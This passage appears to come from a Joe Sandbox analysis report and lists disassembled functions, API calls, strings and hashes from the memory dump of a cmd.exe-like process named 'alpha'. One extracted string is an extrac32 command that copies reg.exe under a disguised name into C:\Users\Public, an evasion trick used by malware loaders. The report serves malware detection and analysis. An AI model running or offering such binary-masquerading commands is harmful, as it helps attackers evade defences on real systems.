                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: exit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2483651598-0
                                                                                                                    • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction ID: 4dbe998938a1ccde1e2616bbed7b2ae8041d5d92cb94ab31587b1f58dbef165b
                                                                                                                    • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction Fuzzy Hash: 69C0123070464A47EB5C7F312495039AD757B09A12F585438C506812C2DD28D404C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF789BC6F97), ref: 00007FF789BD550C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DefaultLangUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 768647712-0
                                                                                                                    • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction ID: b3e7f2505f8ea5d480374330dc7198940b19325730d0eb0ab99fa22926170989
                                                                                                                    • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction Fuzzy Hash: 51E0C2A2D0A2578AF5553E41604A3B4AD73EB69F83FE44031C60E012C8D92D2841D228
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction ID: 3f443d25ecd08591b5cfbccd7b12d507137f4fd42834ccc0b0fcd27fd9ea5c3f
                                                                                                                    • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction Fuzzy Hash: 0DF0B421B097C941EA409B56B544129A6A1AF88FF0B988330EE7C47BC9DE3CD451C300
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FF789BE7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F44
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE7F5C
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F9E
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7FFF
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8020
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8036
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8061
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8075
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80D6
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80EA
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8177
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE819A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81BD
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81DC
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81FB
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE821A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8239
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8291
                                                                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82D7
                                                                                                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82FB
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE831A
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8364
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8378
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE839A
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83AE
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83E6
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8403
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8418
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                    • API String ID: 3637805771-3100821235
                                                                                                                    • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                    • Instruction ID: 95a809d78b5f4528f460f3fc67a900cbc97e4ce3cb9e141c7831a23fb608451d
                                                                                                                    • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                    • Instruction Fuzzy Hash: 56E16C31A08A5A8AE710AF65A40417DFEB5FB49F96BE58234DD1E53790EF3CE444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                    • String ID: DPATH
                                                                                                                    • API String ID: 95024817-2010427443
                                                                                                                    • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                    • Instruction ID: f7e17d679d89f1c2506fcc1769d496c6e4458abb0e943576203c2e3d1857801c
                                                                                                                    • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                    • Instruction Fuzzy Hash: AB12B632A086868AE764AF21944017DFFB5FB89FA6FA45135EA4E57794DF3CE400CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                                                                    • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 4111365348-3662956551
                                                                                                                    • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                    • Instruction ID: 938af7d0400e29b397411a3fa9f50ead7eebe23b0e677e4df856d82e3caf15e8
                                                                                                                    • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                    • Instruction Fuzzy Hash: 3CE1AE21A0864A86EB50AF65A8445BDFFB1FF84FAAFE44131D90E47695EE3CE504C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcsupr.MSVCRT ref: 00007FF789BEEF33
                                                                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEF98
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFA9
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFBF
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BEEFDC
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFED
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF003
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF022
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF083
                                                                                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF092
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF0A5
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BEF0DB
                                                                                                                    • wcschr.MSVCRT ref: 00007FF789BEF135
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF16C
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF185
                                                                                                                      • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
                                                                                                                      • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                    • String ID: <noalias>$CMD.EXE
                                                                                                                    • API String ID: 1161012917-1690691951
                                                                                                                    • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                    • Instruction ID: 522d4477c7e668436f625e1f33634c0789cca3cf7043065c4db2181d243407ee
                                                                                                                    • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                    • Instruction Fuzzy Hash: D9919E21B0965A8AFB14AF60E8101BDAEB4BF49F96FA48135DD0E52695EF3CE445C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                    • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                                                                                                                    • API String ID: 3863671652-4031031593
                                                                                                                    • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                                                                                                    • Instruction ID: d710025a6ff9975953b7bfcff9fd1356fb7ae6e7ee5b7dcbc4b2ce0f601362f0
                                                                                                                    • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                                                                                                    • Instruction Fuzzy Hash: 69E1AE25A0928A82FA60BF25D858379EAB0BF85FA6FF54435D90D027D1DF3CE845C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$BufferConsoleInfoScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1034426908-0
                                                                                                                    • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction ID: b2fa228b6b2128a86568e4075111c73df1b432c6a2fd37bde01896a7301dc641
                                                                                                                    • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction Fuzzy Hash: E7F1A43270878A8AEB64EF21D8502E9BBB4FF85B99FA04135DA4E47695DF3CE504C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAA85
                                                                                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAACF
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAAEC
                                                                                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB39
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB6F
                                                                                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABA4
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABCB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteValue$CreateOpen
                                                                                                                    • String ID: %s=%s
                                                                                                                    • API String ID: 1019019434-1087296587
                                                                                                                    • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction ID: 7cc0154377eafed44a3019c82537d3ea085a5c8921ade8505735a0b2bfc440cc
                                                                                                                    • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction Fuzzy Hash: 04518131B0874A86E760AF65E44476EBEB9FB89F92FA08234CA4D43790DF38D441CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC4A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
